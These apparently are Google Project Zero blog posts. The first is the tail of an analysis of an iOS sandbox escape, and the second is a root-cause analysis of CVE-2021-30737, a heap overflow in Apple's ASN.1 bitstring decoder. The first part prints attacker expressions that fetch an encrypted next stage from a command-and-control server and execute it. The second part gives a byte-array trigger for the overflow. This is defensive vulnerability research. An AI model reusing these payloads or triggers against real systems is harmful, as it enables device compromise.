  • [AKDevice _hardwareModel] returns a string like "iPhone12,3" which determines the exact device model.

  • [AKDevice _buildNumber] returns a string like "18A8395" which in combination with the device model allows determining the exact firmware image running on the device.

  • [NSString randomString] returns a decimal string representation of a 32-bit random integer like "394681493".

Expression 4

[ [CaliCalendarAnonymizer sharedAnonymizedStrings]
  setObject:
    [NSPropertyListSerialization
      propertyListWithData:
        [[[NSData
             dataWithContentsOfURL:
               [[[CaliCalendarAnonymizer sharedAnonymizedStrings]
                 objectForKey:@"0"] URL]
          ] AES128DecryptWithPassword:NSData(XXXX)
         ]  decompressedDataUsingAlgorithm:3 error:]
       options: Class(NSConstantValueExpression)
      format: Class(NSConstantValueExpression)
      errors:Class(NSConstantValueExpression)
  ]
  forKey:@"1"
]

The innermost reference to sharedAnonymizedStrings here grabs the NSURLComponents object and builds the full URL from the query string parameters set earlier. That URL is passed to [NSData dataWithContentsOfURL:] to fetch a data blob from a remote server.

That data blob is decrypted with a hardcoded AES128 key, decompressed using zlib then parsed as a plist. That parsed plist is stored in the sharedAnonymizedStrings dictionary under the key "1".

Expression 5

[ [[NSThread mainThread] threadDictionary]
  addEntriesFromDictionary:
    [[CaliCalendarAnonymizer sharedAnonymizedStrings]
    objectForKey:@"1"]
]

This copies all the keys and values from the "next-stage" plist into the main thread's threadDictionary.

Expression 6

[ [NSExpression expressionWithFormat:
    [[[CaliCalendarAnonymizer sharedAnonymizedStrings]
      objectForKey:@"1"]
    objectForKey: @"a"]
  ]
  expressionValueWithObject:nil context:nil
]

Finally, this fetches the value of the "a" key from the next-stage plist, parses it as an NSExpression string and evaluates it.

End of the line

At this point we lose the ability to follow the exploit. The attackers have escaped the IMTranscoderAgent sandbox, requested a next-stage from the command and control server and executed it, all without any memory corruption or dependencies on particular versions of the operating system.

In response to this exploit iOS 15.1 significantly reduced the computational power available to NSExpressions:

NSExpression immediately forbids certain operations that have significant side effects, like creating and destroying objects. Additionally, casting string class names into Class objects with NSConstantValueExpression is deprecated.

In addition the PTSection and PTRow objects have been hardened with the following check added around the parsing of serialized NSPredicates:

if (os_variant_allows_internal_security_policies(
      "com.apple.PrototypeTools")) {
  [coder decodeObjectOfClass:NSPredicate forKey:@"condition"]
...

Object deserialization across trust boundaries still presents an enormous attack surface however.

Conclusion

Perhaps the most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox. With just two tricks (NSObject pointers in protocols and library loading gadgets) it's likely possible to attack almost every initWithCoder implementation in the dyld_shared_cache. There are presumably many other classes in addition to NSPredicate and NSExpression which provide the building blocks for logic-style exploits.

The expressive power of NSXPC just seems fundamentally ill-suited for use across sandbox boundaries, even though it was designed with exactly that in mind. The attack surface reachable from inside a sandbox should be minimal, enumerable and reviewable. Ideally only code which is required for correct functionality should be reachable; it should be possible to determine exactly what that exposed code is and the amount of exposed code should be small enough that manually reviewing it is tractable.

NSXPC requiring developers to explicitly add remotely-exposed methods to interface protocols is a great example of how to make the attack surface enumerable - you can at least find all the entry points fairly easily. However the support for inheritance means that the attack surface exposed there likely isn't reviewable; it's simply too large for anything beyond a basic example.

Refactoring these critical IPC boundaries to be more prescriptive - only allowing a much narrower set of objects in this case - would be a good step towards making the attack surface reviewable. This would probably require fairly significant refactoring for NSXPC; it's built around natively supporting the Objective-C inheritance model and is used very broadly. But without such changes the exposed attack surface is just too large to audit effectively.

The advent of Memory Tagging Extensions (MTE), likely shipping in multiple consumer devices across the ARM ecosystem this year, is a big step in the defense against memory corruption exploitation. But attackers innovate too, and are likely already two steps ahead with a renewed focus on logic bugs. This sandbox escape exploit is likely a sign of the shift we can expect to see over the next few years if the promises of MTE can be delivered. And this exploit was far more extensible, reliable and generic than almost any memory corruption exploit could ever hope to be.

CVE-2021-30737, @xerub's 2021 iOS ASN.1 Vulnerability

7 April 2022 at 16:08

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability found by @xerub. Phrack published @xerub's writeup so go check that out first.

As well as doing my own vulnerability research I also spend time trying as best as I can to keep up with the public state-of-the-art, especially when details of a particularly interesting vulnerability are announced or a new in-the-wild exploit is caught. Originally this post was just a series of notes I took last year as I was trying to understand this bug. But the bug itself and the narrative around it are so fascinating that I thought it would be worth writing up these notes into a more coherent form to share with the community.

Background

On April 14th 2021 the Washington Post published an article on the unlocking of the San Bernardino iPhone by Azimuth containing a nugget of non-public information:

"Azimuth specialized in finding significant vulnerabilities. Dowd [...] had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person."

There's not that much Mozilla code running on an iPhone and even less which is likely to be part of such an attack surface. Therefore, if accurate, this quote almost certainly meant that Azimuth had exploited a vulnerability in the ASN.1 parser used by Security.framework, which is a fork of Mozilla's NSS ASN.1 parser.

I searched around in bugzilla (Mozilla's issue tracker) looking for candidate vulnerabilities which matched the timeline discussed in the Post article and narrowed it down to a handful of plausible bugs including: 1202868, 1192028, 1245528.

I was surprised that there had been so many exploitable-looking issues in the ASN.1 code and decided to add auditing the NSS ASN.1 parser as a quarterly goal.

A month later, having predictably done absolutely nothing more towards that goal, I saw this tweet from @xerub:

@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021

The shameless excerpt reads:

// This is the real deal. Take no chances, take no prisoners! I AM THE STATE MACHINE!

And CVE-2021-30737, fixed in iOS 14.6 was described in the iOS release notes as:

Screenshot of the iOS 14.6 release note for CVE-2021-30737 (Security; available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)):

Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution

Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code. CVE-2021-30737: xerub

Feeling slightly annoyed that I hadn't acted on my instincts as there was clearly something awesome lurking there I made a mental note to diff the source code once Apple released it which they finally did a few weeks later on opensource.apple.com in the Security package.

Here's the diff between the MacOS 11.4 and 11.3 versions of secasn1d.c which contains the ASN.1 parser:

diff --git a/OSX/libsecurity_asn1/lib/secasn1d.c b/OSX/libsecurity_asn1/lib/secasn1d.c
index f338527..5b4915a 100644
--- a/OSX/libsecurity_asn1/lib/secasn1d.c
+++ b/OSX/libsecurity_asn1/lib/secasn1d.c
@@ -434,9 +434,6 @@ loser:
         PORT_ArenaRelease(cx->our_pool, state->our_mark);
         state->our_mark = NULL;
     }
-    if (new_state != NULL) {
-        PORT_Free(new_state);
-    }
     return NULL;
 }
 
@@ -1794,19 +1791,13 @@ sec_asn1d_parse_bit_string (sec_asn1d_state *state,
     /*PORT_Assert (state->pending > 0); */
     PORT_Assert (state->place == beforeBitString);
 
-    if ((state->pending == 0) || (state->contents_length == 1)) {
+    if (state->pending == 0) {
                if (state->dest != NULL) {
                        SecAsn1Item *item = (SecAsn1Item *)(state->dest);
                        item->Data = NULL;
                        item->Length = 0;
                        state->place = beforeEndOfContents;
-               }
-               if(state->contents_length == 1) {
-                       /* skip over (unused) remainder byte */
-                       return 1;
-               }
-               else {
-                       return 0;
+            return 0;
                }
     }

The first change (removing the PORT_Free) is immaterial for Apple's use case: it fixes a double free which doesn't impact Apple's build, as it's only relevant when "allocator marks" are enabled, and that feature is disabled.

The vulnerability must therefore be in sec_asn1d_parse_bit_string. We know from xerub's tweet that something goes wrong with a state machine, but to figure it out we need to cover some ASN.1 basics and then start looking at how the NSS ASN.1 state machine works.

ASN.1 encoding

ASN.1 is a Type-Length-Value serialization format, but with the neat quirk that it can also handle the case when you don't know the length of the value, but want to serialize it anyway! That quirk is only possible when ASN.1 is encoded according to Basic Encoding Rules (BER.) There is a stricter encoding called DER (Distinguished Encoding Rules) which enforces that a particular value only has a single correct encoding and disallows the cases where you can serialize values without knowing their eventual lengths.

This page is a nice beginner's guide to ASN.1. I'd really recommend skimming that to get a good overview of ASN.1.

There are a lot of built-in types in ASN.1. I'm only going to describe the minimum required to understand this vulnerability (mostly because I don't know any more than that!) So let's just start from the very first byte of a serialized ASN.1 object and figure out how to decode it:

This first byte tells you the type, with the least significant 5 bits defining the type identifier. The special type identifier value of 0x1f tells you that the type identifier doesn't fit in those 5 bits and is instead encoded in a different way (which we'll ignore):

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.

The upper two bits of the first byte tell you the class of the type: universal, application, content-specific or private. For us, we'll leave that as 0 (universal.)

Bit 6 is where the fun starts. A value of 0 tells us that this is a primitive encoding, which means that following the length are content bytes which can be directly interpreted as the intended type. For example, a primitive encoding of the string "HELLO" as an ASN.1 printable string would have a length byte of 5 followed by the ASCII characters "HELLO". All fairly straightforward.

A value of 1 for bit 6 however tells us that this is a constructed encoding. This means that the bytes following the length are not the "raw" content bytes for the type but are instead ASN.1 encodings of one or more "chunks" which need to be individually parsed and concatenated to form the final output value. And to make things extra complicated it's also possible to specify a length value of 0 which means that you don't even know how long the reconstructed output will be or how much of the subsequent input will be required to completely build the output.

This final case (of a constructed type with indefinite length) is known as indefinite form. The end of the input which makes up a single indefinite value is signaled by a serialized type with the identifier, constructed bit, class and length values all equal to 0, which is encoded as two NULL bytes.
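
As a concrete sketch (mine, not from the post), pulling those fields out of the first identifier byte looks something like this:

#include <cstdint>
#include <cstdio>

int main() {
	uint8_t identifier = 0x23;               // example: universal, constructed, BIT STRING
	uint8_t cls         = identifier >> 6;   // upper two bits: 0 = universal
	bool    constructed = identifier & 0x20; // bit 6: 0 = primitive, 1 = constructed
	uint8_t tag         = identifier & 0x1f; // 0x1f would mean the tag is encoded separately
	printf("class=%d constructed=%d tag=%d\n", cls, (int)constructed, tag);
	return 0;
}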

ASN.1 bitstrings

Most of the ASN.1 string types require no special treatment; they're just buffers of raw bytes. Some of them have length restrictions. For example: a BMP string must have an even length and a UNIVERSAL string must be a multiple of 4 bytes in length, but that's about it.

ASN.1 bitstrings are strings of bits as opposed to bytes. You could for example have a bitstring with a length of a single bit (so either a 0 or 1) or a bitstring with a length of 127 bits (so 15 full bytes plus an extra 7 bits.)

Encoded ASN.1 bitstrings have an extra metadata byte after the length but before the contents, which encodes the number of unused bits in the final byte.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.
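
To make that concrete, here is the same 3-bit bitstring written out as raw bytes (a sketch of mine; the byte values follow from the encoding rules above):

#include <cstdint>

// DER encoding of a bitstring holding the three bits 1 0 1:
//   0x03 - universal, primitive, BIT STRING
//   0x02 - length: one metadata byte plus one content byte
//   0x05 - 5 unused bits in the final content byte
//   0xA0 - the three valid bits (101) in the most-significant positions
const uint8_t three_bit_string[] = { 0x03, 0x02, 0x05, 0xA0 };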

Parsing ASN.1

ASN.1 data always needs to be decoded in tandem with a template that tells the parser what data to expect and also provides output pointers to be filled in with the parsed output data. Here's the template my test program uses to exercise the bitstring code:

const SecAsn1Template simple_bitstring_template[] = {
  {
    SEC_ASN1_BIT_STRING | SEC_ASN1_MAY_STREAM, // kind: bit string,
                                               //  may be constructed
    0,     // offset: in dest/src
    NULL,  // sub: subtemplate for indirection
    sizeof(SecAsn1Item) // size: of output structure
  }
};

A SecAsn1Item is a very simple wrapper around a buffer. We can provide a SecAsn1Item for the parser to use to return the parsed bitstring then call the parser:

SecAsn1Item decoded = {0};
PLArenaPool* pool = PORT_NewArena(1024);
SECStatus status =
  SEC_ASN1Decode(pool,     // pool: arena for destination allocations
                 &decoded, // dest: decoded encoded items in to here
                 &simple_bitstring_template, // template
                 asn1_bytes,      // buf: asn1 input bytes
                 asn1_bytes_len); // len: input size

NSS ASN.1 state machine

The state machine has two core data structures:

  • SEC_ASN1DecoderContext - the overall parsing context

  • sec_asn1d_state - a single parser state, kept in a doubly-linked list forming a stack of nested states

Here's a trimmed version of the state object showing the relevant fields:

typedef struct sec_asn1d_state_struct {
  SEC_ASN1DecoderContext *top;
  const SecAsn1Template *theTemplate;
  void *dest;

  struct sec_asn1d_state_struct *parent;
  struct sec_asn1d_state_struct *child;

  sec_asn1d_parse_place place;

  unsigned long contents_length;
  unsigned long pending;
  unsigned long consumed;
  int depth;
} sec_asn1d_state;

The main engine of the parsing state machine is the method SEC_ASN1DecoderUpdate which takes a context object, raw input buffer and length:

SECStatus
SEC_ASN1DecoderUpdate (SEC_ASN1DecoderContext *cx,
                       const char *buf, size_t len)

The current state is stored in the context object's current field, and that state's place field determines which stage of parsing the machine is in. Those states are defined here:

​​typedef enum {

    beforeIdentifier,
    duringIdentifier,
    afterIdentifier,
    beforeLength,
    duringLength,
    afterLength,
    beforeBitString,
    duringBitString,
    duringConstructedString,
    duringGroup,
    duringLeaf,
    duringSaveEncoding,
    duringSequence,
    afterConstructedString,
    afterGroup,
    afterExplicit,
    afterImplicit,
    afterInline,
    afterPointer,
    afterSaveEncoding,
    beforeEndOfContents,
    duringEndOfContents,
    afterEndOfContents,
    beforeChoice,
    duringChoice,
    afterChoice,
    notInUse
} sec_asn1d_parse_place;

The state machine loop switches on the place field to determine which method to call:

  switch (state->place) {
    case beforeIdentifier:
      consumed = sec_asn1d_parse_identifier (state, buf, len);
      what = SEC_ASN1_Identifier;
      break;
    case duringIdentifier:
      consumed = sec_asn1d_parse_more_identifier (state, buf, len);
      what = SEC_ASN1_Identifier;
      break;
    case afterIdentifier:
      sec_asn1d_confirm_identifier (state);
      break;
...

Each state method which could consume input is passed a pointer (buf) to the next unconsumed byte in the raw input buffer and a count of the remaining unconsumed bytes (len).

It's then up to each of those methods to return how much of the input they consumed, and signal any errors by updating the context object's status field.

The parser can be recursive: a state can set its ->place field to a state which expects to handle a parsed child state and then allocate a new child state. For example when parsing an ASN.1 sequence:

  state->place = duringSequence;
  state = sec_asn1d_push_state (state->top, state->theTemplate + 1,
                                state->dest, PR_TRUE);

The current state sets its own next state to duringSequence then calls sec_asn1d_push_state which allocates a new state object, with a new template and a copy of the parent's dest field.

sec_asn1d_push_state updates the context's current field such that the next loop around SEC_ASN1DecoderUpdate will see this child state as the current state:

    cx->current = new_state;

Note that the initial value of the place field (which determines the current state) of the newly allocated child is determined by the template. The final state in the state machine path followed by that child will then be responsible for popping itself off the state stack such that the duringSequence state can be reached by its parent to consume the results of the child.

Buffer management

The buffer management is where the NSS ASN.1 parser starts to get really mind bending. If you read through the code you will notice an extreme lack of bounds checks when the output buffers are being filled in - there basically are none. For example, sec_asn1d_parse_leaf, which copies the raw encoded string bytes, simply memcpy's into the output buffer with no bounds check that the length of the string matches the size of the buffer.

Rather than using explicit bounds checks to ensure lengths are valid, the memory safety is instead supposed to be achieved by relying on the fact that decoding valid ASN.1 can never produce output which is larger than its input.

That is, there are no forms of decompression or input expansion so any parsed output data must be equal to or shorter in length than the input which encoded it. NSS leverages this and over-allocates all output buffers to simply be as large as their inputs.

For primitive strings this is quite simple: the length and input are provided so there's nothing really to go that wrong. But for constructed strings this gets a little fiddly...

One way to think of constructed strings is as trees of substrings, nested up to 32-levels deep. Here's an example:

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.
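
For concreteness, here is one possible byte-level encoding of that tree (a sketch of mine using OCTET STRINGs, where 0x04 is the primitive form and 0x24 the constructed form):

#include <cstdint>

const uint8_t constructed_example[] = {
	0x24, 0x13,                    // outer constructed string, definite length 19
	  0x04, 0x03, 'a', 'b', 'c',   //   primitive "abc"
	  0x24, 0x80,                  //   constructed string, indefinite length
	    0x04, 0x03, 'd', 'e', 'f', //     primitive "def"
	    0x00, 0x00,                //     end-of-contents marker
	  0x04, 0x03, 'g', 'h', 'i',   //   primitive "ghi"
};
// Parsing concatenates the substrings to produce "abcdefghi".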

We start with a constructed definite length string. The string's length value L is the complete size of the remaining input which makes up this string; that number of input bytes should be parsed as substrings and concatenated to form the parsed output.

At this point the NSS ASN.1 string parser allocates the output buffer for the parsed output string using the length L of that first input string. This buffer is an over-allocated worst case. The part which makes it really fun though is that NSS allocates the output buffer then promptly throws away that length! This might not be so obvious from quickly glancing through the code though. The buffer which is allocated is stored as the Data field of a buffer wrapper type:

typedef struct cssm_data {
    size_t Length;
    uint8_t * __nullable Data;
} SecAsn1Item, SecAsn1Oid;

(Recall that we passed in a pointer to a SecAsn1Item in the template; it's the Data field of that which gets filled in with the allocated string buffer pointer here. This type is very slightly different between NSS and Apple's fork, but the difference doesn't matter here.)

That Length field is not the size of the allocated Data buffer. It's a (type-specific) count which determines how many bits or bytes of the buffer pointed to by Data are valid. I say type-specific because for bit-strings Length is stored in units of bits but for other strings it's in units of bytes. (CVE-2016-1950 was a bug in NSS where the code mixed up those units.)
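To make the units difference concrete, here's a small hypothetical sketch (the values are mine, not taken from the code): the same two-byte buffer would be described with Length = 16 when it's a parsed bit-string (bits, assuming no unused bits) but Length = 2 when it's any other string type (bytes).

uint8_t two_bytes[2] = {0xAB, 0xCD};
SecAsn1Item parsed_bit_string   = { .Length = 16, .Data = two_bytes }; /* 16 valid bits */
SecAsn1Item parsed_octet_string = { .Length = 2,  .Data = two_bytes }; /* 2 valid bytes */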

Rather than storing the allocated buffer size along with the buffer pointer, each time a substring/child string is encountered the parser walks back up the stack of currently-being-parsed states to find the inner-most definite length string. As it walks up it examines how much of its input each state has consumed, in order to determine whether the current to-be-parsed substring really is completely enclosed within that inner-most enclosing definite length string.

If that sounds complicated, it is! The logic which does this is here, and it took me a good few days to pull it apart enough to figure out what this was doing:

sec_asn1d_state *parent = sec_asn1d_get_enclosing_construct(state);

while (parent && parent->indefinite) {

  parent = sec_asn1d_get_enclosing_construct(parent);

}

unsigned long remaining = parent->pending;

parent = state;

do {

  if (!sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->consumed,

                                           state->top)

      ||

      /* If parent->indefinite is true, parent->contents_length is

       * zero and this is a no-op. */

      !sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->contents_length,

                                           state->top)

      ||

      /* If parent->indefinite is true, then ensure there is enough

       * space for an EOC tag of 2 bytes. */

      (  parent->indefinite

          &&

          !sec_asn1d_check_and_subtract_length(&remaining,

                                               2,

                                               state->top)

      )

    ) {

      /* This element is larger than its enclosing element, which is

       * invalid. */

       return;

    }

} while ((parent = sec_asn1d_get_enclosing_construct(parent))

         &&

         parent->indefinite);

It first walks up the state stack to find the innermost constructed definite-length state and uses its state->pending value as an upper bound. It then walks the state stack again and, for each in-between state, subtracts from that original value of pending how many bytes could have been consumed by those in-between states. The pending value is therefore vitally important: it's used to derive the upper bound, so if we could mess with it this "bounds check" could go wrong.

After figuring out that this was pretty clearly the only place where any kind of bounds checking takes place I looked back at the fix more closely.

We know that sec_asn1d_parse_bit_string is the only function which changed:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

   

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

   

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

   

    byte = (unsigned char) *buf;

    if (byte > 7) {

        dprintf("decodeError: parse_bit_string remainder oflow\n");

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

   

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

   

    return 1;

}

The characters removed by the patch were highlighted in the original listing; the key part is the "|| (state->contents_length == 1)" clause in the first if statement. This function is meant to return the number of input bytes (pointed to by buf) which it consumed, and my initial hunch was to notice that the patch removed a path through this function where you could get the count of input bytes consumed and pending out of sync. It should be the case that when they return 1 in the removed code they also decrement state->pending, as they do in the other place where this function returns 1.

I spent quite a while trying to figure out how you could actually turn that into something useful but in the end I don't think you can.

So what else is going on here?

This state is reached with buf pointing to the first byte after the length value of a primitive bitstring. state->contents_length is the value of that parsed length. Bitstrings, as discussed earlier, are a unique ASN.1 string type in that they have an extra meta-data byte at the beginning (the unused-bits count byte.) It's perfectly fine to have a definite zero-length string - indeed that's (sort-of) handled earlier than this in the prepareForContents state, which short-circuits straight to afterEndOfContents:

if (state->contents_length == 0 && (! state->indefinite)) {

  /*

   * A zero-length simple or constructed string; we are done.

   */

  state->place = afterEndOfContents;

Here they're detecting a definite-length string type with a content length of 0. But this doesn't handle the edge case of a bitstring which consists only of the unused-bits count byte. The state->contents_length value of that bitstring will be 1, but it doesn't actually have any "contents".
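For concreteness, here's a hypothetical minimal encoding of that edge case (the same shape as the first inner bitstring in the trigger shown later):

uint8_t bitstring_with_only_unused_bits_byte[] = {
    0x03, /* ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING */
    0x01, /* definite length: contents_length will be 1 */
    0x00, /* the unused-bits count byte; no content bits follow */
};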

It's this case which the (state->contents_length == 1) conditional in sec_asn1d_parse_bit_string matches:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

By setting state->place to beforeEndOfContents they are again trying to short-circuit the state machine to skip ahead to the state after the string contents have been consumed. But here they take an additional step which they didn't take when trying to achieve exactly the same thing in prepareForContents. In addition to updating state->place they also NULL out the dest SecAsn1Item's Data field and set the Length to 0.

I mentioned earlier that the new child states which are allocated to recursively parse the sub-strings of constructed strings get a copy of the parent's dest field (which is a pointer to a pointer to the output buffer.) This makes sense: that output buffer is only allocated once then gets recursively filled-in in a linear fashion by the children. (Technically this isn't actually how it works if the outermost string is indefinite length, there's separate handling for that case which instead builds a linked-list of substrings which are eventually concatenated, see sec_asn1d_concat_substrings.)

If the output buffer is only allocated once, what happens if you set Data to NULL like they do here? Taking a step back, does that actually make any sense at all?

No, I don't think it makes any sense. Setting Data to NULL at this point should at the very least cause a memory leak, as it's the only pointer to the output buffer.

The fun part though is that that's not the only consequence of NULLing out that pointer. item->Data is used to signal something else.

Here's a snippet from prepare_for_contents when it's determining whether there's enough space in the output buffer for this substring:

} else if (state->substring) {

  /*

   * If we are a substring of a constructed string, then we may

   * not have to allocate anything (because our parent, the

   * actual constructed string, did it for us).  If we are a

   * substring and we *do* have to allocate, that means our

   * parent is an indefinite-length, so we allocate from our pool;

   * later our parent will copy our string into the aggregated

   * whole and free our pool allocation.

   */

  if (item->Data == NULL) {

    PORT_Assert (item->Length == 0);

    poolp = state->top->our_pool;

  } else {

    alloc_len = 0;

  }

As the comment implies, if both item->Data is NULL at this point and state->substring is true, then (they believe) it must be the case that they are currently parsing a substring of an outer-level indefinite string, which has no definite-sized buffer already allocated. In that case the meaning of the item->Data pointer is different to that which we describe earlier: it's merely a temporary buffer meant to hold only this substring. Just above here alloc_len was set to the content length of this substring; and for the outer-definite-length case it's vitally important that alloc_len then gets set to 0 here (which is really indicating that a buffer has already been allocated and they must not allocate a new one.)

To emphasize the potentially subtle point: the issue is that using this conjunction (state->substring && !item->Data) to determine whether this is a substring of a definite-length string or of an outer-level-indefinite string is not the same as the method used by the convoluted bounds-checking code we saw earlier. That method walks up the current state stack and checks the indefinite bits of the super-strings to determine whether they're processing a substring of an outer-level-indefinite string.

Putting that all together, you might be able to see where this is going... (but it is still pretty subtle.)

Assume that we have an outer definite-length constructed bitstring with three primitive bitstrings as substrings:

Upon encountering the first outer-most definite length constructed bitstring, the code will allocate a fixed-size buffer, large enough to store all the remaining input which makes up this string, which in this case is 42 bytes. At this point dest->Data points to that buffer.

They then allocate a child state, which gets a copy of the dest pointer (not a copy of the dest SecAsn1Item object; a copy of a pointer to it), and proceed to parse the first child substring.

This is a primitive bitstring with a length of 1 which triggers the vulnerable path in sec_asn1d_parse_bit_string and sets dest->Data to NULL. The state machine skips ahead to beforeEndOfContents then eventually the next substring gets parsed - this time with dest->Data == NULL.

Now the logic goes wrong in a bad way and, as we saw in the snippet above, a new dest->Data buffer gets allocated which is the size of only this substring (2 bytes), when in fact dest->Data should already point to a buffer large enough to hold the entire outer definite-length input string. This bitstring's contents then get parsed and copied into that buffer.

Now we come to the third substring. dest->Data is no longer NULL; but the code now has no way of determining that the buffer was in fact only (erroneously) allocated to hold a single substring. It believes the invariant that item->Data only gets allocated once, when the first outer-level definite length string is encountered, and it's that fact alone which it uses to determine whether dest->Data points to a buffer large enough to have this substring appended to it. It then happily appends this third substring, writing outside the bounds of the buffer allocated to store only the second substring.

This gives you a great memory corruption primitive: you can cause allocations of a controlled size and then overflow them with an arbitrary number of arbitrary bytes.

Here's an example encoding for an ASN.1 bitstring which triggers this issue:

   uint8_t concat_bitstrings_constructed_definite_with_zero_len_realloc[]

        = {ASN1_CLASS_UNIVERSAL | ASN1_CONSTRUCTED | ASN1_BIT_STRING, // (0x23)

           0x4a, // initial allocation size

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x1, // force item->Data = NULL

           0x0, // number of unused bits in the final byte

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x2, // this is the reallocation size

           0x0, // number of unused bits in the final byte

           0xff, // only byte of bitstring

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x41, // 64 actual bytes, plus the remainder, will cause 0x40 byte memcpy one byte in to 2 byte allocation

           0x0, // number of unused bits in the final byte

           0xff,

           0xff,// -- continues for overflow

Why wasn't this found by fuzzing?

This is a reasonable question to ask. This source code is really, really hard to audit; even with the diff it was at least a week of work to figure out the true root cause of the bug. I'm not sure if I would have spotted this issue during a code audit. It's very broken but it's quite subtle, and you have to figure out a lot about the state machine and the bounds-checking rules to see it - I think I might have given up before I figured it out and gone to look for something easier.

But the trigger test-case is neither structurally complex nor large, and feels within-grasp for a fuzzer. So why wasn't it found? I'll offer two points for discussion:

Perhaps it's not being fuzzed?

Or at least, it's not being fuzzed in the exact form which it appears in Apple's Security.framework library. I understand that both Mozilla and Google do fuzz the NSS ASN.1 parser and have found a bunch of vulnerabilities, but note that the key part of the vulnerable code ("|| (state->contents_length == 1" in sec_asn1d_parse_bit_string) isn't present in upstream NSS (more on that below.)

Can it be fuzzed effectively?

Even if you did build the Security.framework version of the code and used a coverage guided fuzzer, you might well not trigger any crashes. The code uses a custom heap allocator and you'd have to either replace that with direct calls to the system allocator or use ASAN's custom allocator hooks. Note that upstream NSS does do that, but as I understand it, Apple's fork doesn't.

History

I'm always interested in not just understanding how a vulnerability works but how it was introduced. This case is a particularly compelling example because once you understand the bug, the code construct initially looks extremely suspicious. It only exists in Apple's fork of NSS and the only impact of that change is to introduce a perfect memory corruption primitive. But let's go through the history of the code to convince ourselves that it is much more likely that it was just an unfortunate accident:

The earliest reference to this code I can find is this, which appears to be the initial checkin in the Mozilla CVS repo on March 31, 2000:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

    PORT_Assert (state->pending > 0);

    PORT_Assert (state->place == beforeBitString);

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

On August 24th, 2001 the form of the code changed to something like the current version, in this commit with the message "Memory leak fixes.":

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

-   PORT_Assert (state->pending > 0);

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

+   if (state->pending == 0) {

+       if (state->dest != NULL) {

+           SECItem *item = (SECItem *)(state->dest);

+           item->data = NULL;

+           item->len = 0;

+           state->place = beforeEndOfContents;

+           return 0;

+       }

+   }

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

This commit added the item->data = NULL line but here it's only reachable when pending == 0. I am fairly convinced that this was dead code and not actually reachable (and that the PORT_Assert which they commented out was actually valid.)

The beforeBitString state (which leads to the sec_asn1d_parse_bit_string method being called) will always be preceded by the afterLength state (implemented by sec_asn1d_prepare_for_contents.) On entry to the afterLength state, state->contents_length is equal to the parsed length field and sec_asn1d_prepare_for_contents does:

state->pending = state->contents_length;

So in order to reach sec_asn1d_parse_bit_string with state->pending == 0, state->contents_length would also need to be 0 in sec_asn1d_prepare_for_contents.

That means that in the if/else decision tree below, at least one of the two conditionals must be true:

        if (state->contents_length == 0 && (! state->indefinite)) {

            /*

             * A zero-length simple or constructed string; we are done.

             */

            state->place = afterEndOfContents;

...

        } else if (state->indefinite) {

            /*

             * An indefinite-length string *must* be constructed!

             */

            dprintf("decodeError: prepare for contents indefinite not construncted\n");

            PORT_SetError (SEC_ERROR_BAD_DER);

            state->top->status = decodeError;

yet it is required that neither of those be true in order to reach the final else which is the only path to reaching sec_asn1d_parse_bit_string via the beforeBitString state:

        } else {

            /*

             * A non-zero-length simple string.

             */

            if (state->underlying_kind == SEC_ASN1_BIT_STRING)

                state->place = beforeBitString;

            else

                state->place = duringLeaf;

        }

